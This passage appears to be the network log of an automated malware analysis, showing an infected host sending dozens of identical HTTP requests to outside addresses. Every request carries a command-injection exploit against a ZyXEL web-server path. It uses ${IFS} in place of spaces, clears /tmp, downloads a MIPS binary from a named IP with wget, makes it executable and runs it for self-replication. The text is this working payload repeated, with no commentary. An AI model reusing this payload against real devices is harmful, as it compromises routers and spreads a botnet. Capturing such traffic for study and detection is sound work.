                                                Jan 28, 2024 10:16:13.641268015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1553192.168.2.2358600142.88.127.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641292095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1554192.168.2.2358356188.101.159.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641318083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1555192.168.2.235810660.196.184.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641349077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1556192.168.2.233396879.104.184.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641391993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1557192.168.2.234626076.214.147.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641443968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1558192.168.2.2353262203.155.33.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641449928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1559192.168.2.2333044219.87.177.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641469955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1560192.168.2.233435678.12.129.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.641503096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1561192.168.2.233408859.45.172.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.643630028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1562192.168.2.234317874.117.166.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.643656969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1563192.168.2.234340288.148.52.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.643673897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1564192.168.2.2347126197.199.100.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:13.643723965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1565192.168.2.2337298165.138.71.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637401104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1566192.168.2.2346408164.208.251.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637437105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1567192.168.2.234104235.54.163.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637480974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1568192.168.2.2355692176.254.141.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637494087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1569192.168.2.2351866172.101.155.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637512922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1570192.168.2.233610467.196.31.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637536049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1571192.168.2.236092432.115.238.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637562037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1572192.168.2.233466847.86.200.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637594938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1573192.168.2.233873253.0.19.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637623072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1574192.168.2.2335852138.188.173.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637655020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1575192.168.2.234969059.43.91.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637660027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1576192.168.2.2335968122.45.253.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637722969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1577192.168.2.234437292.180.53.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637727976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1578192.168.2.235184223.36.182.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637768984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1579192.168.2.2352620107.187.169.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637806892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1580192.168.2.2351506122.62.159.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637824059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1581192.168.2.235401682.81.179.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637851954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1582192.168.2.234363231.162.183.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637875080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1583192.168.2.233971279.87.126.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637900114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1584192.168.2.2346638167.208.178.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637949944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1585192.168.2.2337358140.21.237.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637962103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1586192.168.2.2350252171.121.248.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637968063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1587192.168.2.235684666.95.73.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.637995005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1588192.168.2.2344016134.99.157.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638051033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1589192.168.2.235264287.201.115.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638077974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1590192.168.2.2360988116.91.95.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638103962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1591192.168.2.2347174202.67.127.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638127089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1592192.168.2.2339002198.94.35.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638170958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1593192.168.2.234501232.41.78.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638202906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1594192.168.2.2350924153.173.56.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638231039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1595192.168.2.235159614.113.29.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638267040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1596192.168.2.2334814199.251.95.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638283014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1597192.168.2.2358528147.176.2.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638299942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1598192.168.2.2344828195.223.58.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638324976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1599192.168.2.235329823.53.121.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638343096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1600192.168.2.2346784112.12.40.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638375044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1601192.168.2.2356892117.223.193.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638389111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1602192.168.2.235964845.99.16.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638411045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1603192.168.2.235204417.248.2.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638432980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1604192.168.2.2350396145.172.66.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638457060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1605192.168.2.235454690.66.6.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638490915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1606192.168.2.234528889.5.246.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638535976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1607192.168.2.2350652152.191.227.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638575077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1608192.168.2.2339686145.192.108.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638590097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1609192.168.2.235512652.14.251.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638617992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1610192.168.2.233959646.181.171.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638634920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1611192.168.2.2335382149.6.222.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638699055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1612192.168.2.2359082162.147.69.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638731956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1613192.168.2.2333208163.200.165.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638752937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1614192.168.2.235574866.162.142.124443
                                                TimestampBytes transferredDirectionData
